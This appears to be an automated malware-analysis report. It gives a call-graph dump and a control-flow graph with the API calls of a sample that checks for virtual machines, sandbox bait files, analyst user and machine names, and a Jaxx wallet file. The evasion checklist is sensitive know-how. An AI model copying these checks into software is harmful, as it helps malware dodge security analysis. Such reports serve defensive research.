12615 15965d 12614->12615 12620 15966a _unexpected 12615->12620 12616 1596aa 12650 15964a 12616->12650 12617 159695 HeapAlloc 12618 159107 12617->12618 12617->12620 12618->12572 12618->12573 12620->12616 12620->12617 12647 15795d 12620->12647 12623 158d4d HeapFree 12622->12623 12624 158d77 12622->12624 12623->12624 12625 158d62 GetLastError 12623->12625 12624->12566 12626 158d6f ___free_lconv_mon 12625->12626 12627 15964a ___std_exception_copy 12 API calls 12626->12627 12627->12624 12687 158d7c 12628->12687 12634 15b455 12633->12634 12638 15b451 _unexpected 12633->12638 12634->12638 12639 15b35a 12634->12639 12637 15b46f GetProcAddress 12637->12638 12638->12607 12645 15b36b 12639->12645 12640 15b401 12640->12637 12640->12638 12641 15b389 LoadLibraryExW 12642 15b3a4 GetLastError 12641->12642 12643 15b408 12641->12643 12642->12645 12643->12640 12644 15b41a FreeLibrary 12643->12644 12644->12640 12645->12640 12645->12641 12646 15b3d7 LoadLibraryExW 12645->12646 12646->12643 12646->12645 12653 157989 12647->12653 12664 15920b GetLastError 12650->12664 12652 15964f 12652->12618 12654 157995 ___scrt_is_nonwritable_in_current_image 12653->12654 12659 159434 EnterCriticalSection 12654->12659 12656 1579a0 __CreateFrameInfo 12660 1579d7 12656->12660 12659->12656 12663 15947c LeaveCriticalSection 12660->12663 12662 157968 12662->12620 12663->12662 12665 159221 12664->12665 12666 159227 12664->12666 12667 15b568 _unexpected 6 API calls 12665->12667 12668 15b5a7 _unexpected 6 API calls 12666->12668 12669 15922b SetLastError 12666->12669 12667->12666 12670 159243 12668->12670 12669->12652 12670->12669 12672 15965d _unexpected 12 API calls 12670->12672 12673 159258 12672->12673 12674 159271 12673->12674 12675 159260 12673->12675 12676 15b5a7 _unexpected 6 API calls 12674->12676 12677 15b5a7 _unexpected 6 API calls 12675->12677 12678 15927d 12676->12678 12679 15926e 12677->12679 12680 159281 12678->12680 12681 159298 12678->12681 12683 158d42 ___free_lconv_mon 12 API calls 12679->12683 12682 15b5a7 _unexpected 6 API calls 12680->12682 12684 158ee8 _unexpected 12 API calls 12681->12684 12682->12679 12683->12669 12685 1592a3 12684->12685 12686 158d42 ___free_lconv_mon 12 API calls 12685->12686 12686->12669 12688 158d88 ___scrt_is_nonwritable_in_current_image 12687->12688 12701 159434 EnterCriticalSection 12688->12701 12690 158d92 12702 158dc2 12690->12702 12693 158e8e 12694 158e9a ___scrt_is_nonwritable_in_current_image 12693->12694 12706 159434 EnterCriticalSection 12694->12706 12696 158ea4 12707 15906f 12696->12707 12698 158ebc 12711 158edc 12698->12711 12701->12690 12705 15947c LeaveCriticalSection 12702->12705 12704 158db0 12704->12693 12705->12704 12706->12696 12708 1590a5 _unexpected 12707->12708 12709 15907e _unexpected 12707->12709 12708->12698 12709->12708 12714 15b009 12709->12714 12828 15947c LeaveCriticalSection 12711->12828 12713 158eca 12713->12586 12716 15b089 12714->12716 12717 15b01f 12714->12717 12718 158d42 ___free_lconv_mon 14 API calls 12716->12718 12741 15b0d7 12716->12741 12717->12716 12721 15b052 12717->12721 12724 158d42 ___free_lconv_mon 14 API calls 12717->12724 12719 15b0ab 12718->12719 12720 158d42 ___free_lconv_mon 14 API calls 12719->12720 12722 15b0be 12720->12722 12726 158d42 ___free_lconv_mon 14 API calls 12721->12726 12740 15b074 12721->12740 12727 158d42 ___free_lconv_mon 14 API calls 12722->12727 12723 158d42 ___free_lconv_mon 14 API calls 12728 15b07e 12723->12728 12730 15b047 12724->12730 12725 15b0e5 12729 15b145 12725->12729 12736 158d42 14 API calls ___free_lconv_mon 12725->12736 12731 15b069 12726->12731 12732 15b0cc 12727->12732 12733 158d42 ___free_lconv_mon 14 API calls 12728->12733 12734 158d42 ___free_lconv_mon 14 API calls 12729->12734 12742 15abad 12730->12742 12770 15acab 12731->12770 12738 158d42 ___free_lconv_mon 14 API calls 12732->12738 12733->12716 12739 15b14b 12734->12739 12736->12725 12738->12741 12739->12708 12740->12723 12782 15b17a 12741->12782 12743 15abbe 12742->12743 12744 15aca7 12742->12744 12745 15abcf 12743->12745 12746 158d42 ___free_lconv_mon 14 API calls 12743->12746 12744->12721 12747 15abe1 12745->12747 12748 158d42 ___free_lconv_mon 14 API calls 12745->12748 12746->12745 12749 15abf3 12747->12749 12750 158d42 ___free_lconv_mon 14 API calls 12747->12750 12748->12747 12751 15ac05 12749->12751 12753 158d42 ___free_lconv_mon 14 API calls 12749->12753 12750->12749 12752 15ac17 12751->12752 12754 158d42 ___free_lconv_mon 14 API calls 12751->12754 12755 15ac29 12752->12755 12756 158d42 ___free_lconv_mon 14 API calls 12752->12756 12753->12751 12754->12752 12757 15ac3b 12755->12757 12758 158d42 ___free_lconv_mon 14 API calls 12755->12758 12756->12755 12759 15ac4d 12757->12759 12761 158d42 ___free_lconv_mon 14 API calls 12757->12761 12758->12757 12760 15ac5f 12759->12760 12762 158d42 ___free_lconv_mon 14 API calls 12759->12762 12763 15ac71 12760->12763 12764 158d42 ___free_lconv_mon 14 API calls 12760->12764 12761->12759 12762->12760 12765 15ac83 12763->12765 12766 158d42 ___free_lconv_mon 14 API calls 12763->12766 12764->12763 12767 15ac95 12765->12767 12768 158d42 ___free_lconv_mon 14 API calls 12765->12768 12766->12765 12767->12744 12769 158d42 ___free_lconv_mon 14 API calls 12767->12769 12768->12767 12769->12744 12771 15acb8 12770->12771 12781 15ad10 12770->12781 12772 158d42 ___free_lconv_mon 14 API calls 12771->12772 12773 15acc8 12771->12773 12772->12773 12774 158d42 ___free_lconv_mon 14 API calls 12773->12774 12775 15acda 12773->12775 12774->12775 12776 15acec 12775->12776 12777 158d42 ___free_lconv_mon 14 API calls 12775->12777 12778 15acfe 12776->12778 12779 158d42 ___free_lconv_mon 14 API calls 12776->12779 12777->12776 12780 158d42 ___free_lconv_mon 14 API calls 12778->12780 12778->12781 12779->12778 12780->12781 12781->12740 12783 15b187 12782->12783 12784 15b1a6 12782->12784 12783->12784 12788 15ad39 12783->12788 12784->12725 12787 158d42 ___free_lconv_mon 14 API calls 12787->12784 12789 15ae17 12788->12789 12790 15ad4a 12788->12790 12789->12787 12824 15ad14 12790->12824 12793 15ad14 _unexpected 14 API calls 12794 15ad5d 12793->12794 12795 15ad14 _unexpected 14 API calls 12794->12795 12796 15ad68 12795->12796 12797 15ad14 _unexpected 14 API calls 12796->12797 12798 15ad73 12797->12798 12799 15ad14 _unexpected 14 API calls 12798->12799 12800 15ad81 12799->12800 12801 158d42 ___free_lconv_mon 14 API calls 12800->12801 12802 15ad8c 12801->12802 12803 158d42 ___free_lconv_mon 14 API calls 12802->12803 12804 15ad97 12803->12804 12805 158d42 ___free_lconv_mon 14 API calls 12804->12805 12806 15ada2 12805->12806 12807 15ad14 _unexpected 14 API calls 12806->12807 12808 15adb0 12807->12808 12809 15ad14 _unexpected 14 API calls 12808->12809 12810 15adbe 12809->12810 12811 15ad14 _unexpected 14 API calls 12810->12811 12812 15adcf 12811->12812 12813 15ad14 _unexpected 14 API calls 12812->12813 12814 15addd 12813->12814 12815 15ad14 _unexpected 14 API calls 12814->12815 12816 15adeb 12815->12816 12817 158d42 ___free_lconv_mon 14 API calls 12816->12817 12818 15adf6 12817->12818 12819 158d42 ___free_lconv_mon 14 API calls 12818->12819 12820 15ae01 12819->12820 12821 158d42 ___free_lconv_mon 14 API calls 12820->12821 12822 15ae0c 12821->12822 12823 158d42 ___free_lconv_mon 14 API calls 12822->12823 12823->12789 12827 15ad26 12824->12827 12825 15ad35 12825->12793 12826 158d42 ___free_lconv_mon 14 API calls 12826->12827 12827->12825 12827->12826 12828->12713 12868 15b82d 12829->12868 12832 15b944 12836 15b950 ___scrt_is_nonwritable_in_current_image 12832->12836 12833 15920b __CreateFrameInfo 14 API calls 12840 15b981 __CreateFrameInfo 12833->12840 12834 15b9a0 12835 15964a ___std_exception_copy 14 API calls 12834->12835 12838 15b9a5 12835->12838 12836->12833 12836->12834 12837 15b9b2 __CreateFrameInfo 12836->12837 12836->12840 12839 15b9e8 __CreateFrameInfo 12837->12839 12879 159434 EnterCriticalSection 12837->12879 12841 1578c7 ___std_exception_copy 39 API calls 12838->12841 12844 15ba25 12839->12844 12845 15bb22 12839->12845 12855 15ba53 12839->12855 12840->12834 12840->12837 12858 15b98a 12840->12858 12841->12858 12851 1590ba _unexpected 39 API calls 12844->12851 12844->12855 12847 15bb2d 12845->12847 12884 15947c LeaveCriticalSection 12845->12884 12848 158498 __CreateFrameInfo 21 API calls 12847->12848 12850 15bb35 12848->12850 12853 15ba48 12851->12853 12852 1590ba _unexpected 39 API calls 12856 15baa8 12852->12856 12854 1590ba _unexpected 39 API calls 12853->12854 12854->12855 12880 15bace 12855->12880 12857 1590ba _unexpected 39 API calls 12856->12857 12856->12858 12857->12858 12858->12590 12860 1576e7 __CreateFrameInfo 12859->12860 12861 157713 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12860->12861 12864 1577e4 __CreateFrameInfo 12861->12864 12862 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 12863 157802 12862->12863 12863->12597 12864->12862 12886 157813 12865->12886 12869 15b839 ___scrt_is_nonwritable_in_current_image 12868->12869 12874 159434 EnterCriticalSection 12869->12874 12871 15b847 12875 15b889 12871->12875 12874->12871 12878 15947c LeaveCriticalSection 12875->12878 12877 158b84 12877->12590 12877->12832 12878->12877 12879->12839 12881 15bad2 12880->12881 12883 15ba9a 12880->12883 12885 15947c LeaveCriticalSection 12881->12885 12883->12852 12883->12856 12883->12858 12884->12847 12885->12883 12887 157825 ___std_exception_copy 12886->12887 12892 15784a 12887->12892 12889 15783d 12903 157603 12889->12903 12893 157861 12892->12893 12894 15785a 12892->12894 12898 15786f 12893->12898 12913 15763f 12893->12913 12909 157668 GetLastError 12894->12909 12897 157896 12897->12898 12916 1578f4 IsProcessorFeaturePresent 12897->12916 12898->12889 12900 1578c6 12901 157813 ___std_exception_copy 39 API calls 12900->12901 12902 1578d3 12901->12902 12902->12889 12904 15760f 12903->12904 12905 157626 12904->12905 12942 1576ae 12904->12942 12907 157639 12905->12907 12908 1576ae ___std_exception_copy 39 API calls 12905->12908 12907->12602 12908->12907 12910 157681 12909->12910 12920 1592bc 12910->12920 12914 157663 12913->12914 12915 15764a GetLastError SetLastError 12913->12915 12914->12897 12915->12897 12917 157900 12916->12917 12918 1576cb __CreateFrameInfo 8 API calls 12917->12918 12919 157915 GetCurrentProcess TerminateProcess 12918->12919 12919->12900 12921 1592cf 12920->12921 12924 1592d5 12920->12924 12922 15b568 _unexpected 6 API calls 12921->12922 12922->12924 12923 15b5a7 _unexpected 6 API calls 12925 1592ef 12923->12925 12924->12923 12941 157699 SetLastError 12924->12941 12926 15965d _unexpected 14 API calls 12925->12926 12925->12941 12927 1592ff 12926->12927 12928 159307 12927->12928 12929 15931c 12927->12929 12930 15b5a7 _unexpected 6 API calls 12928->12930 12931 15b5a7 _unexpected 6 API calls 12929->12931 12932 159313 12930->12932 12933 159328 12931->12933 12936 158d42 ___free_lconv_mon 14 API calls 12932->12936 12934 15932c 12933->12934 12935 15933b 12933->12935 12937 15b5a7 _unexpected 6 API calls 12934->12937 12938 158ee8 _unexpected 14 API calls 12935->12938 12936->12941 12937->12932 12939 159346 12938->12939 12940 158d42 ___free_lconv_mon 14 API calls 12939->12940 12940->12941 12941->12893 12943 1576c1 12942->12943 12944 1576b8 12942->12944 12943->12905 12945 157668 ___std_exception_copy 16 API calls 12944->12945 12946 1576bd 12945->12946 12946->12943 12947 158b7f CallUnexpected 39 API calls 12946->12947 12948 1576ca 12947->12948 12950 158335 12949->12950 12958 158346 12949->12958 12952 154fd4 __CreateFrameInfo GetModuleHandleW 12950->12952 12954 15833a 12952->12954 12954->12958 12960 1583e9 GetModuleHandleExW 12954->12960 12955 158384 12955->11523 12965 1581d3 12958->12965 12961 15843c 12960->12961 12962 158428 GetProcAddress 12960->12962 12963 15844f FreeLibrary 12961->12963 12964 158458 12961->12964 12962->12961 12963->12964 12964->12958 12966 1581df ___scrt_is_nonwritable_in_current_image 12965->12966 12980 159434 EnterCriticalSection 12966->12980 12968 1581e9 12981 158220 12968->12981 12970 1581f6 12985 158214 12970->12985 12973 15839f 13010 1583d0 12973->13010 12975 1583a9 12976 1583bd 12975->12976 12977 1583ad GetCurrentProcess TerminateProcess 12975->12977 12978 1583e9 __CreateFrameInfo 3 API calls 12976->12978 12977->12976 12979 1583c5 ExitProcess 12978->12979 12980->12968 12982 15822c ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 12981->12982 12984 158290 __CreateFrameInfo 12982->12984 12988 15890d 12982->12988 12984->12970 13009 15947c LeaveCriticalSection 12985->13009 12987 158202 12987->12955 12987->12973 12989 158919 __EH_prolog3 12988->12989 12992 158665 12989->12992 12991 158940 __CreateFrameInfo 12991->12984 12993 158671 ___scrt_is_nonwritable_in_current_image 12992->12993 13000 159434 EnterCriticalSection 12993->13000 12995 15867f 13001 15881d 12995->13001 13000->12995 13002 15868c 13001->13002 13003 15883c 13001->13003 13005 1586b4 13002->13005 13003->13002 13004 158d42 ___free_lconv_mon 14 API calls 13003->13004 13004->13002 13008 15947c LeaveCriticalSection 13005->13008 13007 15869d 13007->12991 13008->13007 13009->12987 13013 15a6ef 13010->13013 13012 1583d5 __CreateFrameInfo 13012->12975 13014 15a6fe __CreateFrameInfo 13013->13014 13015 15a70b 13014->13015 13017 15b4aa 13014->13017 13015->13012 13018 15b425 _unexpected 5 API calls 13017->13018 13019 15b4c6 13018->13019 13019->13015 13021 158ad1 ___scrt_uninitialize_crt 13020->13021 13022 158abf 13020->13022 13021->11566 13023 158acd 13022->13023 13025 15bddd 13022->13025 13023->11566 13028 15bc6e 13025->13028 13031 15bbc2 13028->13031 13032 15bbce ___scrt_is_nonwritable_in_current_image 13031->13032 13039 159434 EnterCriticalSection 13032->13039 13034 15bc44 13048 15bc62 13034->13048 13036 15bbd8 ___scrt_uninitialize_crt 13036->13034 13040 15bb36 13036->13040 13039->13036 13041 15bb42 ___scrt_is_nonwritable_in_current_image 13040->13041 13051 15befa EnterCriticalSection 13041->13051 13043 15bb4c ___scrt_uninitialize_crt 13044 15bb98 13043->13044 13052 15bd78 13043->13052 13065 15bbb6 13044->13065 13167 15947c LeaveCriticalSection 13048->13167 13050 15bc50 13050->13023 13051->13043 13053 15bd8d ___std_exception_copy 13052->13053 13054 15bd94 13053->13054 13055 15bd9f 13053->13055 13056 15bc6e ___scrt_uninitialize_crt 68 API calls 13054->13056 13068 15bd0f 13055->13068 13058 15bd9a 13056->13058 13060 157603 ___std_exception_copy 39 API calls 13058->13060 13061 15bdd7 13060->13061 13061->13044 13063 15bdc0 13081 15cf00 13063->13081 13166 15bf0e LeaveCriticalSection 13065->13166 13067 15bba4 13067->13036 13069 15bd4f 13068->13069 13070 15bd28 13068->13070 13069->13058 13074 15c557 13069->13074 13070->13069 13071 15c557 ___scrt_uninitialize_crt 39 API calls 13070->13071 13072 15bd44 13071->13072 13092 15d71f 13072->13092 13075 15c563 13074->13075 13076 15c578 13074->13076 13077 15964a ___std_exception_copy 14 API calls 13075->13077 13076->13063 13078 15c568 13077->13078 13079 1578c7 ___std_exception_copy 39 API calls 13078->13079 13080 15c573 13079->13080 13080->13063 13082 15cf11 13081->13082 13085 15cf1e 13081->13085 13083 15964a ___std_exception_copy 14 API calls 13082->13083 13091 15cf16 13083->13091 13084 15cf67 13086 15964a ___std_exception_copy 14 API calls 13084->13086 13085->13084 13087 15cf45 13085->13087 13088 15cf6c 13086->13088 13133 15ce5e 13087->13133 13090 1578c7 ___std_exception_copy 39 API calls 13088->13090 13090->13091 13091->13058 13094 15d72b ___scrt_is_nonwritable_in_current_image 13092->13094 13093 15d733 13093->13069 13094->13093 13095 15d76c 13094->13095 13096 15d7b2 13094->13096 13097 15784a ___std_exception_copy 39 API calls 13095->13097 13103 15a864 EnterCriticalSection 13096->13103 13097->13093 13099 15d7b8 13100 15d7d6 13099->13100 13104 15d830 13099->13104 13130 15d828 13100->13130 13103->13099 13105 15d858 13104->13105 13129 15d87b ___scrt_uninitialize_crt 13104->13129 13106 15d85c 13105->13106 13108 15d8b7 13105->13108 13107 15784a ___std_exception_copy 39 API calls 13106->13107 13107->13129 13109 15d8d5 13108->13109 13110 15ded4 ___scrt_uninitialize_crt 41 API calls 13108->13110 13111 15d3ac ___scrt_uninitialize_crt 40 API calls 13109->13111 13110->13109 13112 15d8e7 13111->13112 13113 15d934 13112->13113 13114 15d8ed 13112->13114 13117 15d99d WriteFile 13113->13117 13118 15d948 13113->13118 13115 15d8f5 13114->13115 13116 15d91c 13114->13116 13123 15d344 ___scrt_uninitialize_crt 6 API calls 13115->13123 13115->13129 13119 15cf7d ___scrt_uninitialize_crt 45 API calls 13116->13119 13120 15d9bf GetLastError 13117->13120 13117->13129 13121 15d950 13118->13121 13122 15d989 13118->13122 13119->13129 13120->13129 13125 15d975 13121->13125 13127 15d955 13121->13127 13124 15d429 ___scrt_uninitialize_crt 7 API calls 13122->13124 13123->13129 13124->13129 13126 15d5ed ___scrt_uninitialize_crt 8 API calls 13125->13126 13126->13129 13128 15d504 ___scrt_uninitialize_crt 7 API calls 13127->13128 13127->13129 13128->13129 13129->13100 13131 15a887 ___scrt_uninitialize_crt LeaveCriticalSection 13130->13131 13132 15d82e 13131->13132 13132->13093 13134 15ce6a ___scrt_is_nonwritable_in_current_image 13133->13134 13146 15a864 EnterCriticalSection 13134->13146 13136 15cebe 13138 15964a ___std_exception_copy 14 API calls 13136->13138 13137 15ce79 13137->13136 13147 15a93b 13137->13147 13140 15cec5 13138->13140 13163 15cef4 13140->13163 13141 15cea5 FlushFileBuffers 13141->13140 13142 15ceb1 GetLastError 13141->13142 13160 159637 13142->13160 13146->13137 13148 15a95d 13147->13148 13149 15a948 13147->13149 13151 159637 ___scrt_uninitialize_crt 14 API calls 13148->13151 13154 15a982 13148->13154 13150 159637 ___scrt_uninitialize_crt 14 API calls 13149->13150 13152 15a94d 13150->13152 13155 15a98d 13151->13155 13153 15964a ___std_exception_copy 14 API calls 13152->13153 13156 15a955 13153->13156 13154->13141 13157 15964a ___std_exception_copy 14 API calls 13155->13157 13156->13141 13158 15a995 13157->13158 13159 1578c7 ___std_exception_copy 39 API calls 13158->13159 13159->13156 13161 15920b __CreateFrameInfo 14 API calls 13160->13161 13162 15963c 13161->13162 13162->13136 13164 15a887 ___scrt_uninitialize_crt LeaveCriticalSection 13163->13164 13165 15cedd 13164->13165 13165->13091 13166->13067 13167->13050

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 10989b0-10989c0 call 1099650 3 10989c2-10989d0 0->3 3->3 4 10989d2-10989f8 EnumDisplayDevicesW 3->4 5 10989fa 4->5 6 1098a54-1098a84 GetModuleHandleA GetProcAddress * 2 4->6 7 1098a00-1098a11 StrStrIW 5->7 8 1098a8c-1098aca ExpandEnvironmentStringsW * 2 GetFileAttributesW 6->8 9 1098a86-1098a89 6->9 12 10991b9-10991c1 7->12 13 1098a17-1098a27 StrStrIW 7->13 10 1098aed-1098aef 8->10 11 1098acc-1098ace 8->11 9->8 15 1098af1 10->15 16 1098af6-1098b43 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 10->16 11->10 14 1098ad0-1098adc GetFileAttributesW 11->14 13->12 17 1098a2d-1098a3d StrStrIW 13->17 14->10 18 1098ade-1098ae0 14->18 15->16 19 1098b4d-1098b78 16->19 20 1098b45-1098b47 16->20 17->12 21 1098a43-1098a52 EnumDisplayDevicesW 17->21 18->10 22 1098ae2-1098ae4 18->22 23 1098b80-1098ba6 PathCombineW GetFileAttributesW 19->23 20->12 20->19 21->6 21->7 22->16 26 1098ae6-1098aeb 22->26 24 1098ba8-1098baa 23->24 25 1098bb0 23->25 24->25 27 1098bac-1098bae 24->27 28 1098bb2-1098bc2 25->28 26->15 27->28 28->23 29 1098bc4-1098bc7 28->29 29->12 31 1098bcd-1098c0f PathCombineW * 2 GetFileAttributesW 29->31 32 1098d8b-1098db0 PathCombineW GetFileAttributesW 31->32 33 1098c15-1098c17 31->33 35 1098e67-1098e8a ExpandEnvironmentStringsW GetFileAttributesW 32->35 36 1098db6-1098db8 32->36 33->32 34 1098c1d-1098c29 GetFileAttributesW 33->34 34->32 39 1098c2f-1098c31 34->39 37 1098e8c-1098e8e 35->37 38 1098eb1-1098f2a GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 35->38 36->35 40 1098dbe-1098de9 CreateFileW 36->40 37->38 41 1098e90-1098ea5 GetFileAttributesExW 37->41 43 1098f30-1098f42 lstrcmpW 38->43 39->32 42 1098c37-1098c69 CreateFileW 39->42 44 1098deb-1098e0a GetFileSize GetProcessHeap HeapAlloc 40->44 45 1098e2a-1098e30 40->45 41->38 48 1098ea7-1098eab 41->48 49 1098c6b-1098c8a GetFileSize GetProcessHeap HeapAlloc 42->49 50 1098caa-1098ccf CreateFileW 42->50 43->12 51 1098f48-1098f4d 43->51 52 1098e0c-1098e20 ReadFile 44->52 53 1098e23-1098e24 CloseHandle 44->53 46 1098e4b-1098e4d 45->46 47 1098e32-1098e48 lstrcmpA 45->47 54 1098e5f-1098e61 46->54 55 1098e4f-1098e59 GetProcessHeap HeapFree 46->55 47->46 48->12 48->38 56 1098c8c-1098ca0 ReadFile 49->56 57 1098ca3-1098ca4 CloseHandle 49->57 59 1098cd1-1098cf0 GetFileSize GetProcessHeap HeapAlloc 50->59 60 1098d14-1098d1c 50->60 51->43 58 1098f4f-1098f63 StrStrW 51->58 52->53 53->45 54->12 54->35 55->54 56->57 57->50 58->12 63 1098f69-1098f79 lstrcmpW 58->63 64 1098d0b-1098d0e CloseHandle 59->64 65 1098cf2-1098d08 ReadFile 59->65 61 1098d1e-1098d22 60->61 62 1098d53-1098d55 60->62 61->62 66 1098d24-1098d32 lstrcmpA 61->66 67 1098d6b 62->67 68 1098d57-1098d69 GetProcessHeap HeapFree 62->68 69 1098f7b-1098f88 lstrcmpW 63->69 70 1098f8e-1098f9e 63->70 64->60 65->64 66->62 72 1098d34-1098d50 lstrcmpA 66->72 73 1098d71-1098d73 67->73 68->73 69->12 69->70 71 1098fa5-1098fb4 lstrcmpW 70->71 71->12 74 1098fba-1098fbf 71->74 72->62 75 1098d81-1098d85 73->75 76 1098d75-1098d7b GetProcessHeap HeapFree 73->76 74->71 77 1098fc1-1098fee GlobalMemoryStatusEx 74->77 75->12 75->32 76->75 77->12 78 1098ff4-1099004 lstrcmpW 77->78 79 1099021-1099028 78->79 80 1099006-1099013 lstrcmpW 78->80 82 109902a-1099030 79->82 83 1099064-109907f PathCombineW 79->83 80->79 81 1099015-109901b 80->81 81->12 81->79 82->83 84 1099032-1099038 82->84 85 1099080-109908e 83->85 84->83 87 109903a-109904a lstrcmpW 84->87 85->85 86 1099090-10990aa FindFirstFileW 85->86 88 10990b0-10990b2 86->88 89 1099187-10991b8 GetModuleFileNameW StrStrIW 86->89 87->83 90 109904c-1099050 87->90 91 10990b4-10990c4 lstrcmpW 88->91 90->83 92 1099052-1099059 90->92 93 10990ca-10990da lstrcmpW 91->93 94 1099165-1099175 FindNextFileW 91->94 92->92 95 109905b-109905e 92->95 93->94 96 10990e0-10990f2 93->96 94->91 97 109917b-1099185 FindClose 94->97 95->12 95->83 98 109910b-109911d lstrcmpW 96->98 99 10990f4-1099109 96->99 97->12 97->89 100 109911f-1099129 lstrcmpW 98->100 101 1099143-1099151 98->101 99->98 99->99 100->101 102 109912b-1099135 lstrcmpW 100->102 103 1099153-109915d 101->103 104 1099162 101->104 102->101 105 1099137-1099141 lstrcmpW 102->105 103->94 106 109915f-1099160 103->106 104->94 105->101 105->104 106->94
                              APIs
                              • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 010989EE
                              • StrStrIW.KERNELBASE(?,Hyper-V), ref: 01098A0D
                              • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 01098A23
                              • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 01098A39
                              • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 01098A4E
                              • GetModuleHandleA.KERNEL32(kernel32), ref: 01098A59
                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098A6D
                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 01098A77
                              • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 01098AA3
                              • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 01098AB6
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098AC5
                              • GetFileAttributesW.KERNEL32(?), ref: 01098AD7
                              • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 01098B0B
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 01098B1C
                              • PathCombineW.SHLWAPI(?,?,01092048), ref: 01098B31
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098B3E
                              • PathCombineW.SHLWAPI(?,?,01092060), ref: 01098B90
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098B9D
                              • PathCombineW.SHLWAPI(?,?,Resource.txt), ref: 01098BE6
                              • PathCombineW.SHLWAPI(?,?,OpenVPN.txt), ref: 01098BFB
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098C0A
                              • GetFileAttributesW.KERNEL32(?), ref: 01098C24
                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098C5E
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 01098C6D
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098C79
                              • HeapAlloc.KERNEL32(00000000), ref: 01098C80
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01098C97
                              • CloseHandle.KERNEL32(00000000), ref: 01098CA4
                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098CC3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 01098CD3
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098CDF
                              • HeapAlloc.KERNEL32(00000000), ref: 01098CE6
                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 01098CFF
                              • CloseHandle.KERNEL32(00000000), ref: 01098D0E
                              • lstrcmpA.KERNEL32(00000000,BAIT), ref: 01098D2A
                              • lstrcmpA.KERNEL32(00000000,BAIT), ref: 01098D3A
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098D60
                              • HeapFree.KERNEL32(00000000), ref: 01098D63
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098D78
                              • HeapFree.KERNEL32(00000000), ref: 01098D7B
                              • PathCombineW.SHLWAPI(?,?,new songs.txt), ref: 01098D9E
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098DAB
                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098DDE
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 01098DED
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098DF9
                              • HeapAlloc.KERNEL32(00000000), ref: 01098E00
                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 01098E17
                              • CloseHandle.KERNEL32(00000000), ref: 01098E24
                              • lstrcmpA.KERNEL32(00000000,Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo), ref: 01098E38
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098E52
                              • HeapFree.KERNEL32(00000000), ref: 01098E59
                              • ExpandEnvironmentStringsW.KERNEL32(%appdata%\Jaxx\Local Storage\wallet.dat,?,00000104), ref: 01098E78
                              • GetFileAttributesW.KERNELBASE(?), ref: 01098E85
                              • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 01098E9D
                              • GetComputerNameW.KERNEL32(?,?), ref: 01098EC7
                              • GetUserNameW.ADVAPI32(?,00000101), ref: 01098ED8
                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 01098EE6
                              • GetSystemMetrics.USER32(00000001), ref: 01098EED
                              • lstrcmpW.KERNEL32(?,010921B8), ref: 01098F3E
                              • StrStrW.SHLWAPI(?,d5.vc/g), ref: 01098F5B
                              • lstrcmpW.KERNEL32(?,Bruno), ref: 01098F75
                              • lstrcmpW.KERNEL32(?,DESKTOP-ET51AJO), ref: 01098F84
                              • lstrcmpW.KERNEL32(?,010922B8), ref: 01098FB0
                              • GlobalMemoryStatusEx.KERNELBASE(?), ref: 01098FD2
                              • lstrcmpW.KERNEL32(?,Anna), ref: 01099000
                              • lstrcmpW.KERNEL32(?,ANNA-PC), ref: 0109900F
                              • lstrcmpW.KERNEL32(?,Admin), ref: 01099046
                              • PathCombineW.SHLWAPI(?,?,01092324), ref: 01099077
                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0109909E
                              • lstrcmpW.KERNEL32(?,01092328), ref: 010990C0
                              • lstrcmpW.KERNEL32(?,0109232C), ref: 010990D6
                              • lstrcmpW.KERNELBASE(00000002,doc), ref: 01099119
                              • lstrcmpW.KERNEL32(00000002,docx), ref: 01099125
                              • lstrcmpW.KERNEL32(00000002,xls), ref: 01099131
                              • lstrcmpW.KERNEL32(00000002,xlsx), ref: 0109913D
                              • FindNextFileW.KERNELBASE(00000000,00000000), ref: 0109916D
                              • FindClose.KERNEL32(00000000), ref: 0109917C
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01099195
